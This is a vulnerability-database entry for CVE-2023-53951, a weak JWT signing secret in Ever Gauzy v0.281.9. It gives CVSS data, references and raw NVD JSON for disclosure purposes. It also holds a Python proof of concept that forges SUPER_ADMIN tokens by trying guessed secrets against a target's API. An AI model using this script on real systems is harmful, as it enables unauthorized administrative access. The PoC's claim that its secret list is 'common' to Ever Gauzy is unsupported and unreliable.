CVE-2023-53951

Description

Ever Gauzy v0.281.9 contains a JWT authentication vulnerability that allows attackers to exploit weak HMAC secret key implementation. Attackers can leverage the exposed JWT token to authenticate and gain unauthorized access with administrative permissions.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ever Gauzy v0.281.9及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import jwt import requests from datetime import datetime, timedelta # CVE-2023-53951 PoC - Ever Gauzy JWT Authentication Bypass # Target: Ever Gauzy v0.281.9 # Vulnerability: Weak HMAC secret key allows JWT token forgery TARGET_URL = "http://target-server:3000" API_ENDPOINT = f"{TARGET_URL}/api/auth/login" # Common weak JWT secret keys used in Ever Gauzy (for testing only) WEAK_SECRETS = [ "ever-gauzy-secret", "gauzy-jwt-secret", "secret", "password", "EverGauzy2023", "default-secret-key" ] def create_fake_admin_token(secret): """Generate a forged JWT token with admin privileges""" payload = { "sub": "1", "email": "[email protected]", "role": "SUPER_ADMIN", "iat": int(datetime.utcnow().timestamp()), "exp": int((datetime.utcnow() + timedelta(days=30)).timestamp()) } token = jwt.encode(payload, secret, algorithm="HS256") return token def test_jwt_forgery(): """Test JWT token forgery with weak secrets""" print("[*] CVE-2023-53951 - Ever Gauzy JWT Bypass PoC") print(f"[*] Target: {TARGET_URL}") for secret in WEAK_SECRETS: forged_token = create_fake_admin_token(secret) print(f"[*] Testing secret: {secret}") print(f"[*] Forged token: {forged_token[:50]}...") # Verify token with target server headers = {"Authorization": f"Bearer {forged_token}"} response = requests.get(f"{TARGET_URL}/api/user/me", headers=headers) if response.status_code == 200: print(f"[!] SUCCESS! Valid token forged with secret: {secret}") print(f"[!] Admin access gained: {response.json()}") return forged_token print("[-] All weak secrets failed, try other keys") return None if __name__ == "__main__": test_jwt_forgery()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53951
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53951
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53951/
[4] VulDB https://vuldb.com/cve/CVE-2023-53951
[5] https://github.com/ever-co/ever-gauzy
[6] https://www.exploit-db.com/exploits/51354
[7] https://www.vulncheck.com/advisories/ever-gauzy-jwt-authentication-weakness-via-hmac-secret

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53951", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:51.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ever Gauzy v0.281.9 contains a JWT authentication vulnerability that allows attackers to exploit weak HMAC secret key implementation. Attackers can leverage the exposed JWT token to authenticate and gain unauthorized access with administrative permissions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://github.com/ever-co/ever-gauzy", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51354", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ever-gauzy-jwt-authentication-weakness-via-hmac-secret", "source": "[email protected]"}]}}